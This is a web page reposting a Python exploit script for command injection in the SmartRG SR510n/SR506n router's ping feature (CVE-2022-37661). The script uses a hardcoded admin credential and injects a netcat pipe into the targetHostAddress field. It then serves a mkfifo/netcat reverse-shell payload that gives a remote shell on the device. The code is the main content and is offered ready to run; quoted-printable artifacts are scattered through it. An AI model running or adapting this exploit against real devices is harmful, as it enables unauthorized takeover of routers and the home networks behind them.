Remote code execution

SmartRG Remote Code Execution: SR510n 2.6.13

A Vulnerability was discovered in SmartRG Router, by Security Researcher Yerodin Richards,the vulnerability, an RCE (Remote code execution) affects versions 2.5.15 / 2.6.13.

# Exploit Title: SmartRG Router SR510n 2.6.13 - RCE (Remote Code Execution)
# Date: 13/06/2022
# Exploit Author: Yerodin Richards
# Vendor Homepage: https://adtran.com
# Version: 2.5.15 / 2.6.13 (confirmed)
# Tested on: SR506n (2.5.15) & SR510n (2.6.13)
# CVE : CVE-2022-37661

import requests
from subprocess import Popen, PIPE

router_host =3D "http://192.168.1.1"
authorization_header =3D "YWRtaW46QWRtMW5ATDFtMyM=3D"

lhost =3D "lo"
lport =3D 80

payload_port =3D 81


def main():
    e_proc =3D Popen(["echo", f"rm /tmp/s & mknod /tmp/s p & /bin/sh 0< /tm=
p/s | nc {lhost} {lport} > /tmp/s"], stdout=3DPIPE)
    Popen(["nc", "-nlvp", f"{payload_port}"], stdin=3De_proc.stdout)
    send_payload(f"|nc {lhost} {payload_port}|sh")
    print("done.. check shell")


def get_session():
    url =3D router_host + "/admin/ping.html"
    headers =3D {"Authorization": "Basic {}".format(authorization_header)}
    r =3D requests.get(url, headers=3Dheaders).text
    i =3D r.find("&sessionKey=3D") + len("&sessionKey=3D")
    s =3D ""
    while r[i] !=3D "'":
        s =3D s + r[i]
        i =3D i + 1
    return s


def send_payload(payload):
    print(payload)
    url =3D router_host + "/admin/pingHost.cmd"
    headers =3D {"Authorization": "Basic {}".format(authorization_header)}
    params =3D {"action": "add", "targetHostAddress": payload, "sessionKey"=
: get_session()}
    requests.get(url, headers=3Dheaders, params=3Dparams).text


main()

Suggest an edit to this article

Cybersecurity Knowledge Base

Latest Cybersecurity News

Cybersecurity Academy

Homepage

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for our Weekly Cybersecurity Newsletter Today.

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.
Bookmark
Recommended:  Razer Chroma SDK Server 3.16.02 - Race Condition Remote File Execution
RiSec.n0tst3
Connect
Share the word, let's increase Cybersecurity Awareness as we know it

Leave a Comment

Your email address will not be published. Required fields are marked *

RiSec Captcha 93 − = 88